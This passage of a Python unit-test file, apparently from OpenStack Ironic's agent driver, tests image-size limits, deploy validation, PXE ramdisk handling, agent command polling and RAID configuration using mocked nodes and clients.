'size': 15 * 1024 * 1024,
'disk_format': 'raw',
}
mgr_utils.mock_the_extension_manager(driver='fake_agent')
with task_manager.acquire(self.context, self.node.uuid,
shared=False) as task:
task.node.properties['memory_mb'] = 10
# Image is raw but stream is disabled, so test should fail since
# the image is bigger than the RAM size
self.assertRaises(exception.InvalidParameterValue,
agent.check_image_size,
task, 'fake-image')
show_mock.assert_called_once_with(self.context, 'fake-image')
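# The image-size tests above exercise agent.check_image_size: the image must
# fit within the node's memory_mb (less any configured
# [agent]/memory_consumed_by_agent, since the agent ramdisk normally holds the
# image in memory), except for raw images with [agent]/stream_raw_images
# enabled, which are streamed straight to disk and so may exceed the RAM size.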
class TestAgentDeploy(db_base.DbTestCase):
def setUp(self):
super(TestAgentDeploy, self).setUp()
mgr_utils.mock_the_extension_manager(driver='fake_agent')
self.driver = agent.AgentDeploy()
n = {
'driver': 'fake_agent',
'instance_info': INSTANCE_INFO,
'driver_info': DRIVER_INFO,
'driver_internal_info': DRIVER_INTERNAL_INFO,
}
self.node = object_utils.create_test_node(self.context, **n)
self.ports = [
object_utils.create_test_port(self.context, node_id=self.node.id)]
dhcp_factory.DHCPFactory._dhcp_provider = None
def test_get_properties(self):
expected = agent.COMMON_PROPERTIES
self.assertEqual(expected, self.driver.get_properties())
@mock.patch.object(deploy_utils, 'validate_capabilities',
spec_set=True, autospec=True)
@mock.patch.object(images, 'image_show', autospec=True)
@mock.patch.object(pxe.PXEBoot, 'validate', autospec=True)
def test_validate(self, pxe_boot_validate_mock, show_mock,
validate_capability_mock):
with task_manager.acquire(
self.context, self.node['uuid'], shared=False) as task:
self.driver.validate(task)
pxe_boot_validate_mock.assert_called_once_with(
task.driver.boot, task)
show_mock.assert_called_once_with(self.context, 'fake-image')
validate_capability_mock.assert_called_once_with(task.node)
@mock.patch.object(deploy_utils, 'validate_capabilities',
spec_set=True, autospec=True)
@mock.patch.object(images, 'image_show', autospec=True)
@mock.patch.object(pxe.PXEBoot, 'validate', autospec=True)
def test_validate_driver_info_manage_agent_boot_false(
self, pxe_boot_validate_mock, show_mock,
validate_capability_mock):
self.config(manage_agent_boot=False, group='agent')
self.node.driver_info = {}
self.node.save()
with task_manager.acquire(
self.context, self.node['uuid'], shared=False) as task:
self.driver.validate(task)
self.assertFalse(pxe_boot_validate_mock.called)
show_mock.assert_called_once_with(self.context, 'fake-image')
validate_capability_mock.assert_called_once_with(task.node)
@mock.patch.object(pxe.PXEBoot, 'validate', autospec=True)
def test_validate_instance_info_missing_params(
self, pxe_boot_validate_mock):
self.node.instance_info = {}
self.node.save()
with task_manager.acquire(
self.context, self.node['uuid'], shared=False) as task:
e = self.assertRaises(exception.MissingParameterValue,
self.driver.validate, task)
pxe_boot_validate_mock.assert_called_once_with(
task.driver.boot, task)
self.assertIn('instance_info.image_source', str(e))
@mock.patch.object(pxe.PXEBoot, 'validate', autospec=True)
def test_validate_nonglance_image_no_checksum(
self, pxe_boot_validate_mock):
i_info = self.node.instance_info
i_info['image_source'] = 'http://image-ref'
del i_info['image_checksum']
self.node.instance_info = i_info
self.node.save()
with task_manager.acquire(
self.context, self.node.uuid, shared=False) as task:
self.assertRaises(exception.MissingParameterValue,
self.driver.validate, task)
pxe_boot_validate_mock.assert_called_once_with(
task.driver.boot, task)
@mock.patch.object(images, 'image_show', autospec=True)
@mock.patch.object(pxe.PXEBoot, 'validate', autospec=True)
def test_validate_invalid_root_device_hints(
self, pxe_boot_validate_mock, show_mock):
with task_manager.acquire(self.context, self.node.uuid,
shared=True) as task:
task.node.properties['root_device'] = {'size': 'not-int'}
self.assertRaises(exception.InvalidParameterValue,
task.driver.deploy.validate, task)
pxe_boot_validate_mock.assert_called_once_with(
task.driver.boot, task)
show_mock.assert_called_once_with(self.context, 'fake-image')
@mock.patch.object(images, 'image_show', autospec=True)
@mock.patch.object(pxe.PXEBoot, 'validate', autospec=True)
def test_validate_invalid_proxies(self, pxe_boot_validate_mock, show_mock):
with task_manager.acquire(self.context, self.node.uuid,
shared=True) as task:
task.node.driver_info.update({
'image_https_proxy': 'git://spam.ni',
'image_http_proxy': 'http://spam.ni',
'image_no_proxy': '1' * 500})
self.assertRaisesRegexp(exception.InvalidParameterValue,
'image_https_proxy.*image_no_proxy',
task.driver.deploy.validate, task)
pxe_boot_validate_mock.assert_called_once_with(
task.driver.boot, task)
show_mock.assert_called_once_with(self.context, 'fake-image')
@mock.patch('ironic.conductor.utils.node_power_action', autospec=True)
def test_deploy(self, power_mock):
with task_manager.acquire(
self.context, self.node['uuid'], shared=False) as task:
driver_return = self.driver.deploy(task)
self.assertEqual(driver_return, states.DEPLOYWAIT)
power_mock.assert_called_once_with(task, states.REBOOT)
@mock.patch('ironic.conductor.utils.node_power_action', autospec=True)
def test_tear_down(self, power_mock):
with task_manager.acquire(
self.context, self.node['uuid'], shared=False) as task:
driver_return = self.driver.tear_down(task)
power_mock.assert_called_once_with(task, states.POWER_OFF)
self.assertEqual(driver_return, states.DELETED)
@mock.patch.object(pxe.PXEBoot, 'prepare_ramdisk')
@mock.patch.object(deploy_utils, 'build_agent_options')
@mock.patch.object(agent, 'build_instance_info_for_deploy')
def test_prepare(self, build_instance_info_mock, build_options_mock,
pxe_prepare_ramdisk_mock):
with task_manager.acquire(
self.context, self.node['uuid'], shared=False) as task:
task.node.provision_state = states.DEPLOYING
build_instance_info_mock.return_value = {'foo': 'bar'}
build_options_mock.return_value = {'a': 'b'}
self.driver.prepare(task)
build_instance_info_mock.assert_called_once_with(task)
build_options_mock.assert_called_once_with(task.node)
pxe_prepare_ramdisk_mock.assert_called_once_with(
task, {'a': 'b'})
self.node.refresh()
self.assertEqual('bar', self.node.instance_info['foo'])
@mock.patch.object(pxe.PXEBoot, 'prepare_ramdisk')
@mock.patch.object(deploy_utils, 'build_agent_options')
@mock.patch.object(agent, 'build_instance_info_for_deploy')
def test_prepare_manage_agent_boot_false(
self, build_instance_info_mock, build_options_mock,
pxe_prepare_ramdisk_mock):
self.config(group='agent', manage_agent_boot=False)
with task_manager.acquire(
self.context, self.node['uuid'], shared=False) as task:
task.node.provision_state = states.DEPLOYING
build_instance_info_mock.return_value = {'foo': 'bar'}
self.driver.prepare(task)
build_instance_info_mock.assert_called_once_with(task)
self.assertFalse(build_options_mock.called)
self.assertFalse(pxe_prepare_ramdisk_mock.called)
self.node.refresh()
self.assertEqual('bar', self.node.instance_info['foo'])
@mock.patch.object(pxe.PXEBoot, 'prepare_ramdisk')
@mock.patch.object(deploy_utils, 'build_agent_options')
@mock.patch.object(agent, 'build_instance_info_for_deploy')
def test_prepare_active(
self, build_instance_info_mock, build_options_mock,
pxe_prepare_ramdisk_mock):
with task_manager.acquire(
self.context, self.node['uuid'], shared=False) as task:
task.node.provision_state = states.ACTIVE
self.driver.prepare(task)
self.assertFalse(build_instance_info_mock.called)
self.assertFalse(build_options_mock.called)
self.assertFalse(pxe_prepare_ramdisk_mock.called)
@mock.patch('ironic.common.dhcp_factory.DHCPFactory._set_dhcp_provider')
@mock.patch('ironic.common.dhcp_factory.DHCPFactory.clean_dhcp')
@mock.patch.object(pxe.PXEBoot, 'clean_up_ramdisk')
def test_clean_up(self, pxe_clean_up_ramdisk_mock, clean_dhcp_mock,
set_dhcp_provider_mock):
with task_manager.acquire(
self.context, self.node['uuid'], shared=False) as task:
self.driver.clean_up(task)
pxe_clean_up_ramdisk_mock.assert_called_once_with(task)
set_dhcp_provider_mock.assert_called_once_with()
clean_dhcp_mock.assert_called_once_with(task)
@mock.patch('ironic.common.dhcp_factory.DHCPFactory._set_dhcp_provider')
@mock.patch('ironic.common.dhcp_factory.DHCPFactory.clean_dhcp')
@mock.patch.object(pxe.PXEBoot, 'clean_up_ramdisk')
def test_clean_up_manage_agent_boot_false(self, pxe_clean_up_ramdisk_mock,
clean_dhcp_mock,
set_dhcp_provider_mock):
with task_manager.acquire(
self.context, self.node['uuid'], shared=False) as task:
self.config(group='agent', manage_agent_boot=False)
self.driver.clean_up(task)
self.assertFalse(pxe_clean_up_ramdisk_mock.called)
set_dhcp_provider_mock.assert_called_once_with()
clean_dhcp_mock.assert_called_once_with(task)
@mock.patch('ironic.drivers.modules.deploy_utils.agent_get_clean_steps',
autospec=True)
def test_get_clean_steps(self, mock_get_clean_steps):
# Test getting clean steps
mock_steps = [{'priority': 10, 'interface': 'deploy',
'step': 'erase_devices'}]
mock_get_clean_steps.return_value = mock_steps
with task_manager.acquire(self.context, self.node.uuid) as task:
steps = self.driver.get_clean_steps(task)
mock_get_clean_steps.assert_called_once_with(
task, interface='deploy',
override_priorities={'erase_devices': None})
self.assertEqual(mock_steps, steps)
@mock.patch('ironic.drivers.modules.deploy_utils.agent_get_clean_steps',
autospec=True)
def test_get_clean_steps_config_priority(self, mock_get_clean_steps):
# Test that we can override the priority of get clean steps
# Use 0 because it is an edge case (false-y) and used in devstack
self.config(erase_devices_priority=0, group='deploy')
mock_steps = [{'priority': 10, 'interface': 'deploy',
'step': 'erase_devices'}]
mock_get_clean_steps.return_value = mock_steps
with task_manager.acquire(self.context, self.node.uuid) as task:
self.driver.get_clean_steps(task)
mock_get_clean_steps.assert_called_once_with(
task, interface='deploy',
override_priorities={'erase_devices': 0})
@mock.patch.object(deploy_utils, 'prepare_inband_cleaning', autospec=True)
def test_prepare_cleaning(self, prepare_inband_cleaning_mock):
prepare_inband_cleaning_mock.return_value = states.CLEANWAIT
with task_manager.acquire(self.context, self.node.uuid) as task:
self.assertEqual(
states.CLEANWAIT, self.driver.prepare_cleaning(task))
prepare_inband_cleaning_mock.assert_called_once_with(
task, manage_boot=True)
@mock.patch.object(deploy_utils, 'prepare_inband_cleaning', autospec=True)
def test_prepare_cleaning_manage_agent_boot_false(
self, prepare_inband_cleaning_mock):
prepare_inband_cleaning_mock.return_value = states.CLEANWAIT
self.config(group='agent', manage_agent_boot=False)
with task_manager.acquire(self.context, self.node.uuid) as task:
self.assertEqual(
states.CLEANWAIT, self.driver.prepare_cleaning(task))
prepare_inband_cleaning_mock.assert_called_once_with(
task, manage_boot=False)
@mock.patch.object(deploy_utils, 'tear_down_inband_cleaning',
autospec=True)
def test_tear_down_cleaning(self, tear_down_cleaning_mock):
with task_manager.acquire(self.context, self.node.uuid) as task:
self.driver.tear_down_cleaning(task)
tear_down_cleaning_mock.assert_called_once_with(
task, manage_boot=True)
@mock.patch.object(deploy_utils, 'tear_down_inband_cleaning',
autospec=True)
def test_tear_down_cleaning_manage_agent_boot_false(
self, tear_down_cleaning_mock):
self.config(group='agent', manage_agent_boot=False)
with task_manager.acquire(self.context, self.node.uuid) as task:
self.driver.tear_down_cleaning(task)
tear_down_cleaning_mock.assert_called_once_with(
task, manage_boot=False)
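# A pattern worth noting across TestAgentDeploy: whenever
# [agent]/manage_agent_boot is False, the deploy interface skips every
# PXE/ramdisk step (boot validate, ramdisk prepare/clean_up, and boot
# management during in-band cleaning) and handles only the instance image.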
class TestAgentVendor(db_base.DbTestCase):
def setUp(self):
super(TestAgentVendor, self).setUp()
mgr_utils.mock_the_extension_manager(driver="fake_agent")
self.passthru = agent.AgentVendorInterface()
n = {
'driver': 'fake_agent',
'instance_info': INSTANCE_INFO,
'driver_info': DRIVER_INFO,
'driver_internal_info': DRIVER_INTERNAL_INFO,
}
self.node = object_utils.create_test_node(self.context, **n)
def _test_continue_deploy(self, additional_driver_info=None,
additional_expected_image_info=None):
self.node.provision_state = states.DEPLOYWAIT
self.node.target_provision_state = states.ACTIVE
driver_info = self.node.driver_info
driver_info.update(additional_driver_info or {})
self.node.driver_info = driver_info
self.node.save()
test_temp_url = 'http://image'
expected_image_info = {
'urls': [test_temp_url],
'id': 'fake-image',
'checksum': 'checksum',
'disk_format': 'qcow2',
'container_format': 'bare',
'stream_raw_images': CONF.agent.stream_raw_images,
}
expected_image_info.update(additional_expected_image_info or {})
client_mock = mock.MagicMock(spec_set=['prepare_image'])
self.passthru._client = client_mock
with task_manager.acquire(self.context, self.node.uuid,
shared=False) as task:
self.passthru.continue_deploy(task)
client_mock.prepare_image.assert_called_with(task.node,
expected_image_info)
self.assertEqual(states.DEPLOYWAIT, task.node.provision_state)
self.assertEqual(states.ACTIVE,
task.node.target_provision_state)
def test_continue_deploy(self):
self._test_continue_deploy()
def test_continue_deploy_with_proxies(self):
self._test_continue_deploy(
additional_driver_info={'image_https_proxy': 'https://spam.ni',
'image_http_proxy': 'spam.ni',
'image_no_proxy': '.eggs.com'},
additional_expected_image_info={
'proxies': {'https': 'https://spam.ni',
'http': 'spam.ni'},
'no_proxy': '.eggs.com'}
)
def test_continue_deploy_with_no_proxy_without_proxies(self):
self._test_continue_deploy(
additional_driver_info={'image_no_proxy': '.eggs.com'}
)
def test_continue_deploy_image_source_is_url(self):
instance_info = self.node.instance_info
instance_info['image_source'] = 'http://example.com/woof.img'
self.node.instance_info = instance_info
self._test_continue_deploy(
additional_expected_image_info={
'id': 'woof.img'
}
)
def test_continue_deploy_partition_image(self):
self.node.provision_state = states.DEPLOYWAIT
self.node.target_provision_state = states.ACTIVE
i_info = self.node.instance_info
i_info['kernel'] = 'kernel'
i_info['ramdisk'] = 'ramdisk'
i_info['root_gb'] = 10
i_info['swap_mb'] = 10
i_info['ephemeral_mb'] = 0
i_info['ephemeral_format'] = 'abc'
i_info['configdrive'] = 'configdrive'
i_info['preserve_ephemeral'] = False
i_info['image_type'] = 'partition'
i_info['root_mb'] = 10240
i_info['deploy_boot_mode'] = 'bios'
i_info['capabilities'] = {"boot_option": "local",
"disk_label": "msdos"}
self.node.instance_info = i_info
driver_internal_info = self.node.driver_internal_info
driver_internal_info['is_whole_disk_image'] = False
self.node.driver_internal_info = driver_internal_info
self.node.save()
test_temp_url = 'http://image'
expected_image_info = {
'urls': [test_temp_url],
'id': 'fake-image',
'node_uuid': self.node.uuid,
'checksum': 'checksum',
'disk_format': 'qcow2',
'container_format': 'bare',
'stream_raw_images': True,
'kernel': 'kernel',
'ramdisk': 'ramdisk',
'root_gb': 10,
'swap_mb': 10,
'ephemeral_mb': 0,
'ephemeral_format': 'abc',
'configdrive': 'configdrive',
'preserve_ephemeral': False,
'image_type': 'partition',
'root_mb': 10240,
'boot_option': 'local',
'deploy_boot_mode': 'bios',
'disk_label': 'msdos'
}
client_mock = mock.MagicMock(spec_set=['prepare_image'])
self.passthru._client = client_mock
with task_manager.acquire(self.context, self.node.uuid,
shared=False) as task:
self.passthru.continue_deploy(task)
client_mock.prepare_image.assert_called_with(task.node,
expected_image_info)
self.assertEqual(states.DEPLOYWAIT, task.node.provision_state)
self.assertEqual(states.ACTIVE,
task.node.target_provision_state)
@mock.patch.object(agent.AgentVendorInterface, '_get_uuid_from_result',
autospec=True)
@mock.patch.object(manager_utils, 'node_power_action', autospec=True)
@mock.patch.object(fake.FakePower, 'get_power_state',
spec=types.FunctionType)
@mock.patch.object(agent_client.AgentClient, 'power_off',
spec=types.FunctionType)
@mock.patch.object(pxe.PXEBoot, 'prepare_instance',
autospec=True)
@mock.patch('ironic.drivers.modules.agent.AgentVendorInterface'
'.check_deploy_success', autospec=True)
@mock.patch.object(pxe.PXEBoot, 'clean_up_ramdisk', autospec=True)
def test_reboot_to_instance(self, clean_pxe_mock, check_deploy_mock,
prepare_mock, power_off_mock,
get_power_state_mock, node_power_action_mock,
uuid_mock):
check_deploy_mock.return_value = None
uuid_mock.return_value = 'root_uuid'
self.node.provision_state = states.DEPLOYWAIT
self.node.target_provision_state = states.ACTIVE
self.node.save()
with task_manager.acquire(self.context, self.node.uuid,
shared=False) as task:
get_power_state_mock.return_value = states.POWER_OFF
task.node.driver_internal_info['is_whole_disk_image'] = True
self.passthru.reboot_to_instance(task)
clean_pxe_mock.assert_called_once_with(task.driver.boot, task)
check_deploy_mock.assert_called_once_with(mock.ANY, task.node)
power_off_mock.assert_called_once_with(task.node)
get_power_state_mock.assert_called_once_with(task)
node_power_action_mock.assert_called_once_with(
task, states.REBOOT)
self.assertFalse(prepare_mock.called)
self.assertEqual(states.ACTIVE, task.node.provision_state)
self.assertEqual(states.NOSTATE, task.node.target_provision_state)
driver_int_info = task.node.driver_internal_info
self.assertIsNone(driver_int_info.get('root_uuid_or_disk_id'))
self.assertFalse(uuid_mock.called)
@mock.patch.object(deploy_utils, 'get_boot_mode_for_deploy', autospec=True)
@mock.patch.object(agent.AgentVendorInterface, '_get_uuid_from_result',
autospec=True)
@mock.patch.object(manager_utils, 'node_power_action', autospec=True)
@mock.patch.object(fake.FakePower, 'get_power_state',
spec=types.FunctionType)
@mock.patch.object(agent_client.AgentClient, 'power_off',
spec=types.FunctionType)
@mock.patch.object(pxe.PXEBoot, 'prepare_instance',
autospec=True)
@mock.patch('ironic.drivers.modules.agent.AgentVendorInterface'
'.check_deploy_success', autospec=True)
@mock.patch.object(pxe.PXEBoot, 'clean_up_ramdisk', autospec=True)
def test_reboot_to_instance_partition_image(self, clean_pxe_mock,
check_deploy_mock,
prepare_mock, power_off_mock,
get_power_state_mock,
node_power_action_mock,
uuid_mock, boot_mode_mock):
check_deploy_mock.return_value = None
uuid_mock.return_value = 'root_uuid'
self.node.provision_state = states.DEPLOYWAIT
self.node.target_provision_state = states.ACTIVE
self.node.save()
boot_mode_mock.return_value = 'bios'
with task_manager.acquire(self.context, self.node.uuid,
shared=False) as task:
get_power_state_mock.return_value = states.POWER_OFF
task.node.driver_internal_info['is_whole_disk_image'] = False
self.passthru.reboot_to_instance(task)
self.assertFalse(clean_pxe_mock.called)
check_deploy_mock.assert_called_once_with(mock.ANY, task.node)
power_off_mock.assert_called_once_with(task.node)
get_power_state_mock.assert_called_once_with(task)
node_power_action_mock.assert_called_once_with(
task, states.REBOOT)
prepare_mock.assert_called_once_with(task.driver.boot, task)
self.assertEqual(states.ACTIVE, task.node.provision_state)
self.assertEqual(states.NOSTATE, task.node.target_provision_state)
driver_int_info = task.node.driver_internal_info
self.assertEqual(driver_int_info.get('root_uuid_or_disk_id'),
'root_uuid')
uuid_mock.assert_called_once_with(self.passthru, task, 'root_uuid')
boot_mode_mock.assert_called_once_with(task.node)
@mock.patch.object(agent.AgentVendorInterface, '_get_uuid_from_result',
autospec=True)
@mock.patch.object(manager_utils, 'node_power_action', autospec=True)
@mock.patch.object(fake.FakePower, 'get_power_state',
spec=types.FunctionType)
@mock.patch.object(agent_client.AgentClient, 'power_off',
spec=types.FunctionType)
@mock.patch.object(pxe.PXEBoot, 'prepare_instance',
autospec=True)
@mock.patch('ironic.drivers.modules.agent.AgentVendorInterface'
'.check_deploy_success', autospec=True)
@mock.patch.object(pxe.PXEBoot, 'clean_up_ramdisk', autospec=True)
def test_reboot_to_instance_boot_none(self, clean_pxe_mock,
check_deploy_mock,
prepare_mock, power_off_mock,
get_power_state_mock,
node_power_action_mock,
uuid_mock):
check_deploy_mock.return_value = None
self.node.provision_state = states.DEPLOYWAIT
self.node.target_provision_state = states.ACTIVE
self.node.save()
with task_manager.acquire(self.context, self.node.uuid,
shared=False) as task:
get_power_state_mock.return_value = states.POWER_OFF
task.node.driver_internal_info['is_whole_disk_image'] = True
task.driver.boot = None
self.passthru.reboot_to_instance(task)
self.assertFalse(clean_pxe_mock.called)
self.assertFalse(prepare_mock.called)
power_off_mock.assert_called_once_with(task.node)
check_deploy_mock.assert_called_once_with(mock.ANY, task.node)
driver_int_info = task.node.driver_internal_info
self.assertIsNone(driver_int_info.get('root_uuid_or_disk_id'))
get_power_state_mock.assert_called_once_with(task)
node_power_action_mock.assert_called_once_with(
task, states.REBOOT)
self.assertEqual(states.ACTIVE, task.node.provision_state)
self.assertEqual(states.NOSTATE, task.node.target_provision_state)
self.assertFalse(uuid_mock.called)
@mock.patch.object(agent.AgentVendorInterface, '_get_uuid_from_result',
autospec=True)
@mock.patch.object(manager_utils, 'node_power_action', autospec=True)
@mock.patch.object(fake.FakePower, 'get_power_state',
spec=types.FunctionType)
@mock.patch.object(agent_client.AgentClient, 'power_off',
spec=types.FunctionType)
@mock.patch.object(pxe.PXEBoot, 'prepare_instance',
autospec=True)
@mock.patch('ironic.drivers.modules.agent.AgentVendorInterface'
'.check_deploy_success', autospec=True)
@mock.patch.object(pxe.PXEBoot, 'clean_up_ramdisk', autospec=True)
def test_reboot_to_instance_boot_error(self, clean_pxe_mock,
check_deploy_mock,
prepare_mock, power_off_mock,
get_power_state_mock,
node_power_action_mock,
uuid_mock):
check_deploy_mock.return_value = "Error"
uuid_mock.return_value = None
self.node.provision_state = states.DEPLOYWAIT
self.node.target_provision_state = states.ACTIVE
self.node.save()
with task_manager.acquire(self.context, self.node.uuid,
shared=False) as task:
get_power_state_mock.return_value = states.POWER_OFF
task.node.driver_internal_info['is_whole_disk_image'] = True
task.driver.boot = None
self.passthru.reboot_to_instance(task)
self.assertFalse(clean_pxe_mock.called)
self.assertFalse(prepare_mock.called)
self.assertFalse(power_off_mock.called)
check_deploy_mock.assert_called_once_with(mock.ANY, task.node)
self.assertEqual(states.DEPLOYFAIL, task.node.provision_state)
self.assertEqual(states.ACTIVE, task.node.target_provision_state)
@mock.patch.object(agent_base_vendor.BaseAgentVendor,
'configure_local_boot', autospec=True)
@mock.patch.object(deploy_utils, 'try_set_boot_device', autospec=True)
@mock.patch.object(agent.AgentVendorInterface, '_get_uuid_from_result',
autospec=True)
@mock.patch.object(manager_utils, 'node_power_action', autospec=True)
@mock.patch.object(fake.FakePower, 'get_power_state',
spec=types.FunctionType)
@mock.patch.object(agent_client.AgentClient, 'power_off',
spec=types.FunctionType)
@mock.patch.object(pxe.PXEBoot, 'prepare_instance',
autospec=True)
@mock.patch('ironic.drivers.modules.agent.AgentVendorInterface'
'.check_deploy_success', autospec=True)
@mock.patch.object(pxe.PXEBoot, 'clean_up_ramdisk', autospec=True)
def test_reboot_to_instance_localboot(self, clean_pxe_mock,
check_deploy_mock,
prepare_mock, power_off_mock,
get_power_state_mock,
node_power_action_mock,
uuid_mock,
bootdev_mock,
configure_mock):
check_deploy_mock.return_value = None
uuid_mock.side_effect = ['root_uuid', 'efi_uuid']
self.node.provision_state = states.DEPLOYWAIT
self.node.target_provision_state = states.ACTIVE
self.node.save()
with task_manager.acquire(self.context, self.node.uuid,
shared=False) as task:
get_power_state_mock.return_value = states.POWER_OFF
task.node.driver_internal_info['is_whole_disk_image'] = False
boot_option = {'capabilities': '{"boot_option": "local"}'}
task.node.instance_info = boot_option
self.passthru.reboot_to_instance(task)
self.assertFalse(clean_pxe_mock.called)
check_deploy_mock.assert_called_once_with(mock.ANY, task.node)
self.assertFalse(bootdev_mock.called)
power_off_mock.assert_called_once_with(task.node)
get_power_state_mock.assert_called_once_with(task)
node_power_action_mock.assert_called_once_with(
task, states.REBOOT)
self.assertEqual(states.ACTIVE, task.node.provision_state)
self.assertEqual(states.NOSTATE, task.node.target_provision_state)
@mock.patch.object(agent_client.AgentClient, 'get_commands_status',
autospec=True)
def test_deploy_has_started(self, mock_get_cmd):
with task_manager.acquire(self.context, self.node.uuid) as task:
mock_get_cmd.return_value = []
self.assertFalse(self.passthru.deploy_has_started(task))
@mock.patch.object(agent_client.AgentClient, 'get_commands_status',
autospec=True)
def test_deploy_has_started_is_done(self, mock_get_cmd):
with task_manager.acquire(self.context, self.node.uuid) as task:
mock_get_cmd.return_value = [{'command_name': 'prepare_image',
'command_status': 'SUCCESS'}]
self.assertTrue(self.passthru.deploy_has_started(task))
@mock.patch.object(agent_client.AgentClient, 'get_commands_status',
autospec=True)
def test_deploy_has_started_did_start(self, mock_get_cmd):
with task_manager.acquire(self.context, self.node.uuid) as task:
mock_get_cmd.return_value = [{'command_name': 'prepare_image',
'command_status': 'RUNNING'}]
self.assertTrue(self.passthru.deploy_has_started(task))
@mock.patch.object(agent_client.AgentClient, 'get_commands_status',
autospec=True)
def test_deploy_has_started_multiple_commands(self, mock_get_cmd):
with task_manager.acquire(self.context, self.node.uuid) as task:
mock_get_cmd.return_value = [{'command_name': 'cache_image',
'command_status': 'SUCCESS'},
{'command_name': 'prepare_image',
'command_status': 'RUNNING'}]
self.assertTrue(self.passthru.deploy_has_started(task))
@mock.patch.object(agent_client.AgentClient, 'get_commands_status',
autospec=True)
def test_deploy_has_started_other_commands(self, mock_get_cmd):
with task_manager.acquire(self.context, self.node.uuid) as task:
mock_get_cmd.return_value = [{'command_name': 'cache_image',
'command_status': 'SUCCESS'}]
self.assertFalse(self.passthru.deploy_has_started(task))
@mock.patch.object(agent_client.AgentClient, 'get_commands_status',
autospec=True)
def test_deploy_is_done(self, mock_get_cmd):
with task_manager.acquire(self.context, self.node.uuid) as task:
mock_get_cmd.return_value = [{'command_name': 'prepare_image',
'command_status': 'SUCCESS'}]
self.assertTrue(self.passthru.deploy_is_done(task))
@mock.patch.object(agent_client.AgentClient, 'get_commands_status',
autospec=True)
def test_deploy_is_done_empty_response(self, mock_get_cmd):
with task_manager.acquire(self.context, self.node.uuid) as task:
mock_get_cmd.return_value = []
self.assertFalse(self.passthru.deploy_is_done(task))
@mock.patch.object(agent_client.AgentClient, 'get_commands_status',
autospec=True)
def test_deploy_is_done_race(self, mock_get_cmd):
with task_manager.acquire(self.context, self.node.uuid) as task:
mock_get_cmd.return_value = [{'command_name': 'some_other_command',
'command_status': 'SUCCESS'}]
self.assertFalse(self.passthru.deploy_is_done(task))
@mock.patch.object(agent_client.AgentClient, 'get_commands_status',
autospec=True)
def test_deploy_is_done_still_running(self, mock_get_cmd):
with task_manager.acquire(self.context, self.node.uuid) as task:
mock_get_cmd.return_value = [{'command_name': 'prepare_image',
'command_status': 'RUNNING'}]
self.assertFalse(self.passthru.deploy_is_done(task))
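# Taken together, the cases above pin down the agent polling contract:
# deploy_has_started is True once a prepare_image command appears in the
# agent's command list (RUNNING or SUCCESS), while deploy_is_done additionally
# requires that command to have finished with SUCCESS.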
class AgentRAIDTestCase(db_base.DbTestCase):
def setUp(self):
super(AgentRAIDTestCase, self).setUp()
mgr_utils.mock_the_extension_manager(driver="fake_agent")
self.passthru = agent.AgentVendorInterface()
self.target_raid_config = {
"logical_disks": [
{'size_gb': 200, 'raid_level': 0, 'is_root_volume': True},
{'size_gb': 200, 'raid_level': 5}
]}
self.clean_step = {'step': 'create_configuration',
'interface': 'raid'}
n = {
'driver': 'fake_agent',
'instance_info': INSTANCE_INFO,
'driver_info': DRIVER_INFO,
'driver_internal_info': DRIVER_INTERNAL_INFO,
'target_raid_config': self.target_raid_config,
'clean_step': self.clean_step,
}
self.node = object_utils.create_test_node(self.context, **n)
@mock.patch.object(deploy_utils, 'agent_get_clean_steps', autospec=True)
def test_get_clean_steps(self, get_steps_mock):
get_steps_mock.return_value = [
{'step': 'create_configuration', 'interface': 'raid',
'priority': 1},
{'step': 'delete_configuration', 'interface': 'raid',
'priority': 2}]
with task_manager.acquire(self.context, self.node.uuid) as task:
ret = task.driver.raid.get_clean_steps(task)
self.assertEqual(0, ret[0]['priority'])
self.assertEqual(0, ret[1]['priority'])
@mock.patch.object(deploy_utils, 'agent_execute_clean_step',
autospec=True)
def test_create_configuration(self, execute_mock):
with task_manager.acquire(self.context, self.node.uuid) as task:
execute_mock.return_value = states.CLEANWAIT
return_value = task.driver.raid.create_configuration(task)
self.assertEqual(states.CLEANWAIT, return_value)
self.assertEqual(
self.target_raid_config,
task.node.driver_internal_info['target_raid_config'])
execute_mock.assert_called_once_with(task, self.clean_step)
@mock.patch.object(deploy_utils, 'agent_execute_clean_step',
autospec=True)
def test_create_configuration_skip_root(self, execute_mock):
with task_manager.acquire(self.context, self.node.uuid) as task:
execute_mock.return_value = states.CLEANWAIT
return_value = task.driver.raid.create_configuration(
task, create_root_volume=False)
self.assertEqual(states.CLEANWAIT, return_value)
execute_mock.assert_called_once_with(task, self.clean_step)
exp_target_raid_config = {
"logical_disks": [
{'size_gb': 200, 'raid_level': 5}
]}
self.assertEqual(
exp_target_raid_config,
task.node.driver_internal_info['target_raid_config'])
@mock.patch.object(deploy_utils, 'agent_execute_clean_step',
autospec=True)
def test_create_configuration_skip_nonroot(self, execute_mock):
with task_manager.acquire(self.context, self.node.uuid) as task:
execute_mock.return_value = states.CLEANWAIT
return_value = task.driver.raid.create_configuration(
task, create_nonroot_volumes=False)
self.assertEqual(states.CLEANWAIT, return_value)
execute_mock.assert_called_once_with(task, self.clean_step)
exp_target_raid_config = {
"logical_disks": [
{'size_gb': 200, 'raid_level': 0, 'is_root_volume': True},
]}
self.assertEqual(
exp_target_raid_config,
task.node.driver_internal_info['target_raid_config'])
@mock.patch.object(deploy_utils, 'agent_execute_clean_step',
autospec=True)
def test_create_configuration_no_target_raid_config_after_skipping(
self, execute_mock):
with task_manager.acquire(self.context, self.node.uuid) as task:
self.assertRaises(
exception.MissingParameterValue,
task.driver.raid.create_configuration,
task, create_root_volume=False,
create_nonroot_volumes=False)
self.assertFalse(execute_mock.called)
@mock.patch.object(deploy_utils, 'agent_execute_clean_step',
autospec=True)
def test_create_configuration_empty_target_raid_config(
self, execute_mock):
execute_mock.return_value = states.CLEANING
self.node.target_raid_config = {}
self.node.save()
with task_manager.acquire(self.context, self.node.uuid) as task:
self.assertRaises(exception.MissingParameterValue,
task.driver.raid.create_configuration,
task)
self.assertFalse(execute_mock.called)
@mock.patch.object(raid, 'update_raid_info', autospec=True)
def test__create_configuration_final(
self, update_raid_info_mock):
command = {'command_result': {'clean_result': 'foo'}}
with task_manager.acquire(self.context, self.node.uuid) as task:
raid_mgmt = agent.AgentRAID
raid_mgmt._create_configuration_final(task, command)
update_raid_info_mock.assert_called_once_with(task.node, 'foo')
@mock.patch.object(raid, 'update_raid_info', autospec=True)
def test__create_configuration_final_registered(
self, update_raid_info_mock):
self.node.clean_step = {'interface': 'raid',
'step': 'create_configuration'}
command = {'command_result': {'clean_result': 'foo'}}
